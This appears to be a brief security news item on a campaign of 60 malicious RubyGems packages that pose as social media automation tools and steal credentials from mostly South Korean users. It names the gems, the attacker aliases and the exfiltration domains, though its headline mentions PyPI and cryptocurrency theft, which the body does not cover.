RubyGems and PyPI Targeted by Malicious Packages: Credential and Cryptocurrency Theft Prompting Urgent Security Updates
A recent investigation has revealed a new set of 60 malicious packages targeting the RubyGems ecosystem. These packages masquerade as harmless automation tools for social media, blogging, and messaging services, with the intent of stealing user credentials. The activity has been active since at least March 2023, as reported by the software supply chain security company Socket. Collectively, these gems have been downloaded over 275,000 times, although this figure may not accurately reflect the number of compromised systems, as not every download leads to execution, and multiple downloads could occur on a single machine.
The threat actor, operating under aliases such as Zon, Nowon, Kwonsoonje, and Soonje, has published these malicious gems, which claim to provide functionalities like bulk posting and engagement. However, they also contain hidden features that exfiltrate usernames and passwords to an external server controlled by the attacker. Notably, some gems, including Njongto_Duo and Jongmogtolon, target financial discussion platforms, promoting tools that flood investment forums with ticker mentions and stock narratives to manipulate public perception. The servers receiving the stolen information include Programzon.com, Appspace.kr, and Marketingduo.co.kr, which are associated with bulk messaging and automated social media tools. The victims of this campaign are likely grey-hat marketers who utilise such tools for spam and search engine optimisation (SEO) campaigns. Each gem functions as a Windows-targeting infostealer, primarily aimed at South Korean users, as indicated by the Korean-language user interfaces and exfiltration to .kr domains. This campaign demonstrates a mature and persistent operation, embedding credential theft functionality within seemingly legitimate gems.
Categories: Malicious Software, Credential Theft, Social Media Automation Tools
Tags: Malicious Packages, RubyGems, Credential Theft, Automation Tools, Social Media, Exfiltration, Grey-Hat Marketers, Infostealer, Typosquatting, Cryptocurrency